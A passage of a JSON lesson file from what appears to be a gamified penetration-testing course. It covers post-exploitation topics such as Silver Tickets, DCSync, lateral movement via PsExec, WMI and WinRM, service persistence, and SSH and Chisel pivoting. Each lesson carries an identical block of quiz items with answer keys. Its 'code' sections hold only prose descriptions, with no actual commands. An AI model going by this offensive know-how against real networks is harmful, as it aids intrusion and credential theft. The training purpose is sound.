enumerate","Launch ransomware","Disconnect"],"ans":1},{"type":"quiz","q":"Mimikatz requires which privilege?","opts":["User","SeDebugPrivilege / admin","Guest","Network"],"ans":1},{"type":"quiz","q":"Pass the hash works because NTLM...","opts":["Is encrypted end-to-end","Accepts the hash directly for authentication","Requires a password","Is disabled by default"],"ans":1},{"type":"quiz","q":"Kerberoasting requests tickets for...","opts":["Machine accounts","Service accounts with SPNs","All users","Domain controllers"],"ans":1},{"type":"quiz","q":"A Golden Ticket requires...","opts":["Domain admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"Data exfiltration over DNS works because...","opts":["DNS is encrypted","DNS traffic is rarely blocked/inspected","DNS is fast","DNS is bidirectional"],"ans":1},{"type":"quiz","q":"LOLBins are...","opts":["Malware binaries","Legitimate system binaries abused for attacks","Encryption tools","Log files"],"ans":1},{"type":"quiz","q":"What is persistence in post-exploitation?","opts":["Staying connected after reboot/logout","Running a port scan","Cracking passwords","Writing a report"],"ans":0},{"type":"quiz","q":"Proxychains routes traffic through...","opts":["VPN","A SOCKS proxy","DNS","A firewall"],"ans":1},{"type":"quiz","q":"Empire/Covenant/Sliver are...","opts":["Vulnerability scanners","C2 (command and control) frameworks","Password managers","Log analyzers"],"ans":1},{"type":"quiz","q":"What is pivoting?","opts":["Rotating encryption keys","Using a compromised host to access other networks","Changing IP addresses","Switching protocols"],"ans":1},{"type":"quiz","q":"DCSync impersonates...","opts":["A web server","A domain controller to replicate credentials","An email server","A DNS server"],"ans":1},{"type":"quiz","q":"Token impersonation steals...","opts":["Files","Security tokens from other processes","Network packets","Registry keys"],"ans":1},{"type":"quiz","q":"Scheduled tasks provide persistence because...","opts":["They run in memory only","They survive reboots","They're encrypted","They use DNS"],"ans":1},{"type":"quiz","q":"First thing after shell?","opts":["Delete logs","Stabilize and enumerate","Install ransomware","Attack another target"],"ans":1},{"type":"quiz","q":"Mimikatz needs...","opts":["User privs","Admin/SYSTEM privilege","Guest","Network"],"ans":1},{"type":"quiz","q":"Pass-the-hash works because NTLM...","opts":["Is encrypted","Accepts hash directly","Requires password","Is disabled"],"ans":1},{"type":"quiz","q":"Kerberoasting requests...","opts":["Machine tickets","Service account tickets with SPNs","All tickets","DC tickets"],"ans":1},{"type":"quiz","q":"Golden Ticket needs...","opts":["Admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"LOLBins are...","opts":["Malware","Legitimate system binaries abused for attacks","Encryption tools","Log files"],"ans":1},{"type":"quiz","q":"Persistence means...","opts":["Speed","Access survives reboots","Better encryption","Smaller files"],"ans":1},{"type":"quiz","q":"Proxychains routes through...","opts":["VPN","SOCKS proxy","DNS","Firewall"],"ans":1},{"type":"quiz","q":"C2 frameworks include...","opts":["Nmap","Empire, Sliver, Covenant","Hashcat","Wireshark"],"ans":1},{"type":"quiz","q":"Pivoting accesses...","opts":["Internet","Networks via compromised host","Cloud","Email"],"ans":1}]},{"id":"px-px-silver-ticket","cat":"Post-Exploitation","title":"Silver Ticket","diff":3,"xp":200,"intro":"Forge service tickets without touching the DC.","sections":[{"type":"text","content":"Forge service tickets without touching the DC."},{"type":"code","lang":"bash","content":"With a service hash, create TGS for that service \u2014 no DC contact"},{"type":"text","content":"Getting a shell is just the start. The value comes from understanding the environment, finding sensitive data, and demonstrating business impact."},{"type":"tip","content":"Screenshot findings, log commands, note timestamps. Explain business impact: 'access to 50K customer records' hits harder than 'got a database shell.'"},{"type":"task","content":"Set up an AD lab. Practice the full chain: enumerate, find DA path with BloodHound, execute it, write a professional report finding."},{"type":"quiz","q":"Silver tickets are harder to detect because...","opts":["They're encrypted","They don't contact the DC","They're faster","They use UDP"],"ans":1},{"type":"quiz","q":"BloodHound uses what to find attack paths?","opts":["Port scanning","Active Directory relationship graph","Brute force","Web crawling"],"ans":1},{"type":"quiz","q":"What should you do immediately after getting a shell?","opts":["Delete evidence","Stabilize the shell and enumerate","Launch ransomware","Disconnect"],"ans":1},{"type":"quiz","q":"Mimikatz requires which privilege?","opts":["User","SeDebugPrivilege / admin","Guest","Network"],"ans":1},{"type":"quiz","q":"Pass the hash works because NTLM...","opts":["Is encrypted end-to-end","Accepts the hash directly for authentication","Requires a password","Is disabled by default"],"ans":1},{"type":"quiz","q":"Kerberoasting requests tickets for...","opts":["Machine accounts","Service accounts with SPNs","All users","Domain controllers"],"ans":1},{"type":"quiz","q":"A Golden Ticket requires...","opts":["Domain admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"Data exfiltration over DNS works because...","opts":["DNS is encrypted","DNS traffic is rarely blocked/inspected","DNS is fast","DNS is bidirectional"],"ans":1},{"type":"quiz","q":"LOLBins are...","opts":["Malware binaries","Legitimate system binaries abused for attacks","Encryption tools","Log files"],"ans":1},{"type":"quiz","q":"What is persistence in post-exploitation?","opts":["Staying connected after reboot/logout","Running a port scan","Cracking passwords","Writing a report"],"ans":0},{"type":"quiz","q":"Proxychains routes traffic through...","opts":["VPN","A SOCKS proxy","DNS","A firewall"],"ans":1},{"type":"quiz","q":"Empire/Covenant/Sliver are...","opts":["Vulnerability scanners","C2 (command and control) frameworks","Password managers","Log analyzers"],"ans":1},{"type":"quiz","q":"What is pivoting?","opts":["Rotating encryption keys","Using a compromised host to access other networks","Changing IP addresses","Switching protocols"],"ans":1},{"type":"quiz","q":"DCSync impersonates...","opts":["A web server","A domain controller to replicate credentials","An email server","A DNS server"],"ans":1},{"type":"quiz","q":"Token impersonation steals...","opts":["Files","Security tokens from other processes","Network packets","Registry keys"],"ans":1},{"type":"quiz","q":"First thing after shell?","opts":["Delete logs","Stabilize and enumerate","Install ransomware","Attack another target"],"ans":1},{"type":"quiz","q":"Mimikatz needs...","opts":["User privs","Admin/SYSTEM privilege","Guest","Network"],"ans":1},{"type":"quiz","q":"Pass-the-hash works because NTLM...","opts":["Is encrypted","Accepts hash directly","Requires password","Is disabled"],"ans":1},{"type":"quiz","q":"Kerberoasting requests...","opts":["Machine tickets","Service account tickets with SPNs","All tickets","DC tickets"],"ans":1},{"type":"quiz","q":"Golden Ticket needs...","opts":["Admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"LOLBins are...","opts":["Malware","Legitimate system binaries abused for attacks","Encryption tools","Log files"],"ans":1},{"type":"quiz","q":"Persistence means...","opts":["Speed","Access survives reboots","Better encryption","Smaller files"],"ans":1},{"type":"quiz","q":"Proxychains routes through...","opts":["VPN","SOCKS proxy","DNS","Firewall"],"ans":1},{"type":"quiz","q":"C2 frameworks include...","opts":["Nmap","Empire, Sliver, Covenant","Hashcat","Wireshark"],"ans":1},{"type":"quiz","q":"Pivoting accesses...","opts":["Internet","Networks via compromised host","Cloud","Email"],"ans":1}]},{"id":"px-px-dcsync","cat":"Post-Exploitation","title":"DCSync","diff":3,"xp":200,"intro":"Replicate password data from a domain controller.","sections":[{"type":"text","content":"Replicate password data from a domain controller."},{"type":"code","lang":"bash","content":"With replication rights, request any account's password hash"},{"type":"text","content":"Getting a shell is just the start. The value comes from understanding the environment, finding sensitive data, and demonstrating business impact."},{"type":"tip","content":"Screenshot findings, log commands, note timestamps. Explain business impact: 'access to 50K customer records' hits harder than 'got a database shell.'"},{"type":"task","content":"Set up an AD lab. Practice the full chain: enumerate, find DA path with BloodHound, execute it, write a professional report finding."},{"type":"quiz","q":"DCSync requires which permission?","opts":["Admin","Replicating Directory Changes","Schema Admin","Backup"],"ans":1},{"type":"quiz","q":"Scheduled tasks provide persistence because...","opts":["They run in memory only","They survive reboots","They're encrypted","They use DNS"],"ans":1},{"type":"quiz","q":"BloodHound uses what to find attack paths?","opts":["Port scanning","Active Directory relationship graph","Brute force","Web crawling"],"ans":1},{"type":"quiz","q":"What should you do immediately after getting a shell?","opts":["Delete evidence","Stabilize the shell and enumerate","Launch ransomware","Disconnect"],"ans":1},{"type":"quiz","q":"Mimikatz requires which privilege?","opts":["User","SeDebugPrivilege / admin","Guest","Network"],"ans":1},{"type":"quiz","q":"Pass the hash works because NTLM...","opts":["Is encrypted end-to-end","Accepts the hash directly for authentication","Requires a password","Is disabled by default"],"ans":1},{"type":"quiz","q":"Kerberoasting requests tickets for...","opts":["Machine accounts","Service accounts with SPNs","All users","Domain controllers"],"ans":1},{"type":"quiz","q":"A Golden Ticket requires...","opts":["Domain admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"Data exfiltration over DNS works because...","opts":["DNS is encrypted","DNS traffic is rarely blocked/inspected","DNS is fast","DNS is bidirectional"],"ans":1},{"type":"quiz","q":"LOLBins are...","opts":["Malware binaries","Legitimate system binaries abused for attacks","Encryption tools","Log files"],"ans":1},{"type":"quiz","q":"What is persistence in post-exploitation?","opts":["Staying connected after reboot/logout","Running a port scan","Cracking passwords","Writing a report"],"ans":0},{"type":"quiz","q":"Proxychains routes traffic through...","opts":["VPN","A SOCKS proxy","DNS","A firewall"],"ans":1},{"type":"quiz","q":"Empire/Covenant/Sliver are...","opts":["Vulnerability scanners","C2 (command and control) frameworks","Password managers","Log analyzers"],"ans":1},{"type":"quiz","q":"What is pivoting?","opts":["Rotating encryption keys","Using a compromised host to access other networks","Changing IP addresses","Switching protocols"],"ans":1},{"type":"quiz","q":"DCSync impersonates...","opts":["A web server","A domain controller to replicate credentials","An email server","A DNS server"],"ans":1},{"type":"quiz","q":"First thing after shell?","opts":["Delete logs","Stabilize and enumerate","Install ransomware","Attack another target"],"ans":1},{"type":"quiz","q":"Mimikatz needs...","opts":["User privs","Admin/SYSTEM privilege","Guest","Network"],"ans":1},{"type":"quiz","q":"Pass-the-hash works because NTLM...","opts":["Is encrypted","Accepts hash directly","Requires password","Is disabled"],"ans":1},{"type":"quiz","q":"Kerberoasting requests...","opts":["Machine tickets","Service account tickets with SPNs","All tickets","DC tickets"],"ans":1},{"type":"quiz","q":"Golden Ticket needs...","opts":["Admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"LOLBins are...","opts":["Malware","Legitimate system binaries abused for attacks","Encryption tools","Log files"],"ans":1},{"type":"quiz","q":"Persistence means...","opts":["Speed","Access survives reboots","Better encryption","Smaller files"],"ans":1},{"type":"quiz","q":"Proxychains routes through...","opts":["VPN","SOCKS proxy","DNS","Firewall"],"ans":1},{"type":"quiz","q":"C2 frameworks include...","opts":["Nmap","Empire, Sliver, Covenant","Hashcat","Wireshark"],"ans":1},{"type":"quiz","q":"Pivoting accesses...","opts":["Internet","Networks via compromised host","Cloud","Email"],"ans":1}]},{"id":"px-px-lateral-psexec","cat":"Post-Exploitation","title":"Lateral Movement: PsExec","diff":2,"xp":150,"intro":"Move to other machines using admin credentials.","sections":[{"type":"text","content":"Move to other machines using admin credentials."},{"type":"code","lang":"bash","content":"Creates a service on the remote machine for command execution"},{"type":"text","content":"Getting a shell is just the start. The value comes from understanding the environment, finding sensitive data, and demonstrating business impact."},{"type":"tip","content":"Screenshot findings, log commands, note timestamps. Explain business impact: 'access to 50K customer records' hits harder than 'got a database shell.'"},{"type":"task","content":"Set up an AD lab. Practice the full chain: enumerate, find DA path with BloodHound, execute it, write a professional report finding."},{"type":"quiz","q":"PsExec works over...","opts":["HTTP","SMB (port 445)","RDP","SSH"],"ans":1},{"type":"quiz","q":"What should you do immediately after getting a shell?","opts":["Delete evidence","Stabilize the shell and enumerate","Launch ransomware","Disconnect"],"ans":1},{"type":"quiz","q":"Mimikatz requires which privilege?","opts":["User","SeDebugPrivilege / admin","Guest","Network"],"ans":1},{"type":"quiz","q":"Pass the hash works because NTLM...","opts":["Is encrypted end-to-end","Accepts the hash directly for authentication","Requires a password","Is disabled by default"],"ans":1},{"type":"quiz","q":"Kerberoasting requests tickets for...","opts":["Machine accounts","Service accounts with SPNs","All users","Domain controllers"],"ans":1},{"type":"quiz","q":"A Golden Ticket requires...","opts":["Domain admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"Data exfiltration over DNS works because...","opts":["DNS is encrypted","DNS traffic is rarely blocked/inspected","DNS is fast","DNS is bidirectional"],"ans":1},{"type":"quiz","q":"LOLBins are...","opts":["Malware binaries","Legitimate system binaries abused for attacks","Encryption tools","Log files"],"ans":1},{"type":"quiz","q":"What is persistence in post-exploitation?","opts":["Staying connected after reboot/logout","Running a port scan","Cracking passwords","Writing a report"],"ans":0},{"type":"quiz","q":"Proxychains routes traffic through...","opts":["VPN","A SOCKS proxy","DNS","A firewall"],"ans":1},{"type":"quiz","q":"Empire/Covenant/Sliver are...","opts":["Vulnerability scanners","C2 (command and control) frameworks","Password managers","Log analyzers"],"ans":1},{"type":"quiz","q":"What is pivoting?","opts":["Rotating encryption keys","Using a compromised host to access other networks","Changing IP addresses","Switching protocols"],"ans":1},{"type":"quiz","q":"DCSync impersonates...","opts":["A web server","A domain controller to replicate credentials","An email server","A DNS server"],"ans":1},{"type":"quiz","q":"Token impersonation steals...","opts":["Files","Security tokens from other processes","Network packets","Registry keys"],"ans":1},{"type":"quiz","q":"Scheduled tasks provide persistence because...","opts":["They run in memory only","They survive reboots","They're encrypted","They use DNS"],"ans":1},{"type":"quiz","q":"First thing after shell?","opts":["Delete logs","Stabilize and enumerate","Install ransomware","Attack another target"],"ans":1},{"type":"quiz","q":"Mimikatz needs...","opts":["User privs","Admin/SYSTEM privilege","Guest","Network"],"ans":1},{"type":"quiz","q":"Pass-the-hash works because NTLM...","opts":["Is encrypted","Accepts hash directly","Requires password","Is disabled"],"ans":1},{"type":"quiz","q":"Kerberoasting requests...","opts":["Machine tickets","Service account tickets with SPNs","All tickets","DC tickets"],"ans":1},{"type":"quiz","q":"Golden Ticket needs...","opts":["Admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"LOLBins are...","opts":["Malware","Legitimate system binaries abused for attacks","Encryption tools","Log files"],"ans":1},{"type":"quiz","q":"Persistence means...","opts":["Speed","Access survives reboots","Better encryption","Smaller files"],"ans":1},{"type":"quiz","q":"Proxychains routes through...","opts":["VPN","SOCKS proxy","DNS","Firewall"],"ans":1},{"type":"quiz","q":"C2 frameworks include...","opts":["Nmap","Empire, Sliver, Covenant","Hashcat","Wireshark"],"ans":1},{"type":"quiz","q":"Pivoting accesses...","opts":["Internet","Networks via compromised host","Cloud","Email"],"ans":1}]},{"id":"px-px-lateral-wmi","cat":"Post-Exploitation","title":"Lateral Movement: WMI","diff":2,"xp":150,"intro":"Execute commands remotely via WMI.","sections":[{"type":"text","content":"Execute commands remotely via WMI."},{"type":"code","lang":"bash","content":"WMI provides remote command execution without creating a service"},{"type":"text","content":"Getting a shell is just the start. The value comes from understanding the environment, finding sensitive data, and demonstrating business impact."},{"type":"tip","content":"Screenshot findings, log commands, note timestamps. Explain business impact: 'access to 50K customer records' hits harder than 'got a database shell.'"},{"type":"task","content":"Set up an AD lab. Practice the full chain: enumerate, find DA path with BloodHound, execute it, write a professional report finding."},{"type":"quiz","q":"WMI advantage over PsExec...","opts":["Faster","Doesn't create a service (less evidence)","Encrypted","Simpler"],"ans":1},{"type":"quiz","q":"BloodHound uses what to find attack paths?","opts":["Port scanning","Active Directory relationship graph","Brute force","Web crawling"],"ans":1},{"type":"quiz","q":"What should you do immediately after getting a shell?","opts":["Delete evidence","Stabilize the shell and enumerate","Launch ransomware","Disconnect"],"ans":1},{"type":"quiz","q":"Mimikatz requires which privilege?","opts":["User","SeDebugPrivilege / admin","Guest","Network"],"ans":1},{"type":"quiz","q":"Pass the hash works because NTLM...","opts":["Is encrypted end-to-end","Accepts the hash directly for authentication","Requires a password","Is disabled by default"],"ans":1},{"type":"quiz","q":"Kerberoasting requests tickets for...","opts":["Machine accounts","Service accounts with SPNs","All users","Domain controllers"],"ans":1},{"type":"quiz","q":"A Golden Ticket requires...","opts":["Domain admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"Data exfiltration over DNS works because...","opts":["DNS is encrypted","DNS traffic is rarely blocked/inspected","DNS is fast","DNS is bidirectional"],"ans":1},{"type":"quiz","q":"LOLBins are...","opts":["Malware binaries","Legitimate system binaries abused for attacks","Encryption tools","Log files"],"ans":1},{"type":"quiz","q":"What is persistence in post-exploitation?","opts":["Staying connected after reboot/logout","Running a port scan","Cracking passwords","Writing a report"],"ans":0},{"type":"quiz","q":"Proxychains routes traffic through...","opts":["VPN","A SOCKS proxy","DNS","A firewall"],"ans":1},{"type":"quiz","q":"Empire/Covenant/Sliver are...","opts":["Vulnerability scanners","C2 (command and control) frameworks","Password managers","Log analyzers"],"ans":1},{"type":"quiz","q":"What is pivoting?","opts":["Rotating encryption keys","Using a compromised host to access other networks","Changing IP addresses","Switching protocols"],"ans":1},{"type":"quiz","q":"DCSync impersonates...","opts":["A web server","A domain controller to replicate credentials","An email server","A DNS server"],"ans":1},{"type":"quiz","q":"Token impersonation steals...","opts":["Files","Security tokens from other processes","Network packets","Registry keys"],"ans":1},{"type":"quiz","q":"First thing after shell?","opts":["Delete logs","Stabilize and enumerate","Install ransomware","Attack another target"],"ans":1},{"type":"quiz","q":"Mimikatz needs...","opts":["User privs","Admin/SYSTEM privilege","Guest","Network"],"ans":1},{"type":"quiz","q":"Pass-the-hash works because NTLM...","opts":["Is encrypted","Accepts hash directly","Requires password","Is disabled"],"ans":1},{"type":"quiz","q":"Kerberoasting requests...","opts":["Machine tickets","Service account tickets with SPNs","All tickets","DC tickets"],"ans":1},{"type":"quiz","q":"Golden Ticket needs...","opts":["Admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"LOLBins are...","opts":["Malware","Legitimate system binaries abused for attacks","Encryption tools","Log files"],"ans":1},{"type":"quiz","q":"Persistence means...","opts":["Speed","Access survives reboots","Better encryption","Smaller files"],"ans":1},{"type":"quiz","q":"Proxychains routes through...","opts":["VPN","SOCKS proxy","DNS","Firewall"],"ans":1},{"type":"quiz","q":"C2 frameworks include...","opts":["Nmap","Empire, Sliver, Covenant","Hashcat","Wireshark"],"ans":1},{"type":"quiz","q":"Pivoting accesses...","opts":["Internet","Networks via compromised host","Cloud","Email"],"ans":1}]},{"id":"px-px-lateral-winrm","cat":"Post-Exploitation","title":"Lateral Movement: WinRM","diff":2,"xp":150,"intro":"PowerShell remoting for command execution.","sections":[{"type":"text","content":"PowerShell remoting for command execution."},{"type":"code","lang":"bash","content":"WinRM (5985/5986) provides PowerShell remoting access"},{"type":"text","content":"Getting a shell is just the start. The value comes from understanding the environment, finding sensitive data, and demonstrating business impact."},{"type":"tip","content":"Screenshot findings, log commands, note timestamps. Explain business impact: 'access to 50K customer records' hits harder than 'got a database shell.'"},{"type":"task","content":"Set up an AD lab. Practice the full chain: enumerate, find DA path with BloodHound, execute it, write a professional report finding."},{"type":"quiz","q":"WinRM uses which ports?","opts":["445","5985/5986","3389","22"],"ans":1},{"type":"quiz","q":"What should you do immediately after getting a shell?","opts":["Delete evidence","Stabilize the shell and enumerate","Launch ransomware","Disconnect"],"ans":1},{"type":"quiz","q":"Mimikatz requires which privilege?","opts":["User","SeDebugPrivilege / admin","Guest","Network"],"ans":1},{"type":"quiz","q":"Pass the hash works because NTLM...","opts":["Is encrypted end-to-end","Accepts the hash directly for authentication","Requires a password","Is disabled by default"],"ans":1},{"type":"quiz","q":"Kerberoasting requests tickets for...","opts":["Machine accounts","Service accounts with SPNs","All users","Domain controllers"],"ans":1},{"type":"quiz","q":"A Golden Ticket requires...","opts":["Domain admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"Data exfiltration over DNS works because...","opts":["DNS is encrypted","DNS traffic is rarely blocked/inspected","DNS is fast","DNS is bidirectional"],"ans":1},{"type":"quiz","q":"LOLBins are...","opts":["Malware binaries","Legitimate system binaries abused for attacks","Encryption tools","Log files"],"ans":1},{"type":"quiz","q":"What is persistence in post-exploitation?","opts":["Staying connected after reboot/logout","Running a port scan","Cracking passwords","Writing a report"],"ans":0},{"type":"quiz","q":"Proxychains routes traffic through...","opts":["VPN","A SOCKS proxy","DNS","A firewall"],"ans":1},{"type":"quiz","q":"Empire/Covenant/Sliver are...","opts":["Vulnerability scanners","C2 (command and control) frameworks","Password managers","Log analyzers"],"ans":1},{"type":"quiz","q":"What is pivoting?","opts":["Rotating encryption keys","Using a compromised host to access other networks","Changing IP addresses","Switching protocols"],"ans":1},{"type":"quiz","q":"DCSync impersonates...","opts":["A web server","A domain controller to replicate credentials","An email server","A DNS server"],"ans":1},{"type":"quiz","q":"Token impersonation steals...","opts":["Files","Security tokens from other processes","Network packets","Registry keys"],"ans":1},{"type":"quiz","q":"Scheduled tasks provide persistence because...","opts":["They run in memory only","They survive reboots","They're encrypted","They use DNS"],"ans":1},{"type":"quiz","q":"First thing after shell?","opts":["Delete logs","Stabilize and enumerate","Install ransomware","Attack another target"],"ans":1},{"type":"quiz","q":"Mimikatz needs...","opts":["User privs","Admin/SYSTEM privilege","Guest","Network"],"ans":1},{"type":"quiz","q":"Pass-the-hash works because NTLM...","opts":["Is encrypted","Accepts hash directly","Requires password","Is disabled"],"ans":1},{"type":"quiz","q":"Kerberoasting requests...","opts":["Machine tickets","Service account tickets with SPNs","All tickets","DC tickets"],"ans":1},{"type":"quiz","q":"Golden Ticket needs...","opts":["Admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"LOLBins are...","opts":["Malware","Legitimate system binaries abused for attacks","Encryption tools","Log files"],"ans":1},{"type":"quiz","q":"Persistence means...","opts":["Speed","Access survives reboots","Better encryption","Smaller files"],"ans":1},{"type":"quiz","q":"Proxychains routes through...","opts":["VPN","SOCKS proxy","DNS","Firewall"],"ans":1},{"type":"quiz","q":"C2 frameworks include...","opts":["Nmap","Empire, Sliver, Covenant","Hashcat","Wireshark"],"ans":1},{"type":"quiz","q":"Pivoting accesses...","opts":["Internet","Networks via compromised host","Cloud","Email"],"ans":1}]},{"id":"px-px-persistence-svc","cat":"Post-Exploitation","title":"Windows Service Persistence","diff":2,"xp":150,"intro":"Create a service for persistent access.","sections":[{"type":"text","content":"Create a service for persistent access."},{"type":"code","lang":"bash","content":"Services survive reboots and run as SYSTEM by default"},{"type":"text","content":"Getting a shell is just the start. The value comes from understanding the environment, finding sensitive data, and demonstrating business impact."},{"type":"tip","content":"Screenshot findings, log commands, note timestamps. Explain business impact: 'access to 50K customer records' hits harder than 'got a database shell.'"},{"type":"task","content":"Set up an AD lab. Practice the full chain: enumerate, find DA path with BloodHound, execute it, write a professional report finding."},{"type":"quiz","q":"Services persist because...","opts":["They run in memory","They're registered with the Service Control Manager","They modify the kernel","They use DNS"],"ans":1},{"type":"quiz","q":"BloodHound uses what to find attack paths?","opts":["Port scanning","Active Directory relationship graph","Brute force","Web crawling"],"ans":1},{"type":"quiz","q":"What should you do immediately after getting a shell?","opts":["Delete evidence","Stabilize the shell and enumerate","Launch ransomware","Disconnect"],"ans":1},{"type":"quiz","q":"Mimikatz requires which privilege?","opts":["User","SeDebugPrivilege / admin","Guest","Network"],"ans":1},{"type":"quiz","q":"Pass the hash works because NTLM...","opts":["Is encrypted end-to-end","Accepts the hash directly for authentication","Requires a password","Is disabled by default"],"ans":1},{"type":"quiz","q":"Kerberoasting requests tickets for...","opts":["Machine accounts","Service accounts with SPNs","All users","Domain controllers"],"ans":1},{"type":"quiz","q":"A Golden Ticket requires...","opts":["Domain admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"Data exfiltration over DNS works because...","opts":["DNS is encrypted","DNS traffic is rarely blocked/inspected","DNS is fast","DNS is bidirectional"],"ans":1},{"type":"quiz","q":"LOLBins are...","opts":["Malware binaries","Legitimate system binaries abused for attacks","Encryption tools","Log files"],"ans":1},{"type":"quiz","q":"What is persistence in post-exploitation?","opts":["Staying connected after reboot/logout","Running a port scan","Cracking passwords","Writing a report"],"ans":0},{"type":"quiz","q":"Proxychains routes traffic through...","opts":["VPN","A SOCKS proxy","DNS","A firewall"],"ans":1},{"type":"quiz","q":"Empire/Covenant/Sliver are...","opts":["Vulnerability scanners","C2 (command and control) frameworks","Password managers","Log analyzers"],"ans":1},{"type":"quiz","q":"What is pivoting?","opts":["Rotating encryption keys","Using a compromised host to access other networks","Changing IP addresses","Switching protocols"],"ans":1},{"type":"quiz","q":"DCSync impersonates...","opts":["A web server","A domain controller to replicate credentials","An email server","A DNS server"],"ans":1},{"type":"quiz","q":"Token impersonation steals...","opts":["Files","Security tokens from other processes","Network packets","Registry keys"],"ans":1},{"type":"quiz","q":"First thing after shell?","opts":["Delete logs","Stabilize and enumerate","Install ransomware","Attack another target"],"ans":1},{"type":"quiz","q":"Mimikatz needs...","opts":["User privs","Admin/SYSTEM privilege","Guest","Network"],"ans":1},{"type":"quiz","q":"Pass-the-hash works because NTLM...","opts":["Is encrypted","Accepts hash directly","Requires password","Is disabled"],"ans":1},{"type":"quiz","q":"Kerberoasting requests...","opts":["Machine tickets","Service account tickets with SPNs","All tickets","DC tickets"],"ans":1},{"type":"quiz","q":"Golden Ticket needs...","opts":["Admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"LOLBins are...","opts":["Malware","Legitimate system binaries abused for attacks","Encryption tools","Log files"],"ans":1},{"type":"quiz","q":"Persistence means...","opts":["Speed","Access survives reboots","Better encryption","Smaller files"],"ans":1},{"type":"quiz","q":"Proxychains routes through...","opts":["VPN","SOCKS proxy","DNS","Firewall"],"ans":1},{"type":"quiz","q":"C2 frameworks include...","opts":["Nmap","Empire, Sliver, Covenant","Hashcat","Wireshark"],"ans":1},{"type":"quiz","q":"Pivoting accesses...","opts":["Internet","Networks via compromised host","Cloud","Email"],"ans":1}]},{"id":"px-px-pivot-ssh","cat":"Post-Exploitation","title":"SSH Pivoting","diff":2,"xp":150,"intro":"Use SSH tunnels to reach internal networks.","sections":[{"type":"text","content":"Use SSH tunnels to reach internal networks."},{"type":"code","lang":"bash","content":"Dynamic SOCKS proxy (-D), local (-L), and remote (-R) port forwarding"},{"type":"text","content":"Getting a shell is just the start. The value comes from understanding the environment, finding sensitive data, and demonstrating business impact."},{"type":"tip","content":"Screenshot findings, log commands, note timestamps. Explain business impact: 'access to 50K customer records' hits harder than 'got a database shell.'"},{"type":"task","content":"Set up an AD lab. Practice the full chain: enumerate, find DA path with BloodHound, execute it, write a professional report finding."},{"type":"quiz","q":"SSH -D creates...","opts":["VPN","SOCKS proxy","File transfer","DNS tunnel"],"ans":1},{"type":"quiz","q":"What should you do immediately after getting a shell?","opts":["Delete evidence","Stabilize the shell and enumerate","Launch ransomware","Disconnect"],"ans":1},{"type":"quiz","q":"Mimikatz requires which privilege?","opts":["User","SeDebugPrivilege / admin","Guest","Network"],"ans":1},{"type":"quiz","q":"Pass the hash works because NTLM...","opts":["Is encrypted end-to-end","Accepts the hash directly for authentication","Requires a password","Is disabled by default"],"ans":1},{"type":"quiz","q":"Kerberoasting requests tickets for...","opts":["Machine accounts","Service accounts with SPNs","All users","Domain controllers"],"ans":1},{"type":"quiz","q":"A Golden Ticket requires...","opts":["Domain admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"Data exfiltration over DNS works because...","opts":["DNS is encrypted","DNS traffic is rarely blocked/inspected","DNS is fast","DNS is bidirectional"],"ans":1},{"type":"quiz","q":"LOLBins are...","opts":["Malware binaries","Legitimate system binaries abused for attacks","Encryption tools","Log files"],"ans":1},{"type":"quiz","q":"What is persistence in post-exploitation?","opts":["Staying connected after reboot/logout","Running a port scan","Cracking passwords","Writing a report"],"ans":0},{"type":"quiz","q":"Proxychains routes traffic through...","opts":["VPN","A SOCKS proxy","DNS","A firewall"],"ans":1},{"type":"quiz","q":"Empire/Covenant/Sliver are...","opts":["Vulnerability scanners","C2 (command and control) frameworks","Password managers","Log analyzers"],"ans":1},{"type":"quiz","q":"What is pivoting?","opts":["Rotating encryption keys","Using a compromised host to access other networks","Changing IP addresses","Switching protocols"],"ans":1},{"type":"quiz","q":"DCSync impersonates...","opts":["A web server","A domain controller to replicate credentials","An email server","A DNS server"],"ans":1},{"type":"quiz","q":"Token impersonation steals...","opts":["Files","Security tokens from other processes","Network packets","Registry keys"],"ans":1},{"type":"quiz","q":"Scheduled tasks provide persistence because...","opts":["They run in memory only","They survive reboots","They're encrypted","They use DNS"],"ans":1},{"type":"quiz","q":"First thing after shell?","opts":["Delete logs","Stabilize and enumerate","Install ransomware","Attack another target"],"ans":1},{"type":"quiz","q":"Mimikatz needs...","opts":["User privs","Admin/SYSTEM privilege","Guest","Network"],"ans":1},{"type":"quiz","q":"Pass-the-hash works because NTLM...","opts":["Is encrypted","Accepts hash directly","Requires password","Is disabled"],"ans":1},{"type":"quiz","q":"Kerberoasting requests...","opts":["Machine tickets","Service account tickets with SPNs","All tickets","DC tickets"],"ans":1},{"type":"quiz","q":"Golden Ticket needs...","opts":["Admin password","krbtgt hash","DNS access","Physical access"],"ans":1},{"type":"quiz","q":"LOLBins are...","opts":["Malware","Legitimate system binaries abused for attacks","Encryption tools","Log files"],"ans":1},{"type":"quiz","q":"Persistence means...","opts":["Speed","Access survives reboots","Better encryption","Smaller files"],"ans":1},{"type":"quiz","q":"Proxychains routes through...","opts":["VPN","SOCKS proxy","DNS","Firewall"],"ans":1},{"type":"quiz","q":"C2 frameworks include...","opts":["Nmap","Empire, Sliver, Covenant","Hashcat","Wireshark"],"ans":1},{"type":"quiz","q":"Pivoting accesses...","opts":["Internet","Networks via compromised host","Cloud","Email"],"ans":1}]},{"id":"px-px-pivot-chisel","cat":"Post-Exploitation","title":"Chisel Pivoting","diff":2,"xp":150,"intro":"HTTP-based tunneling when SSH isn't available.","sections":[{"type":"text","content":"HTTP-based tunneling when SSH isn't available."},{"type":"code","lang":"bash","content":"Single binary, tunnels over 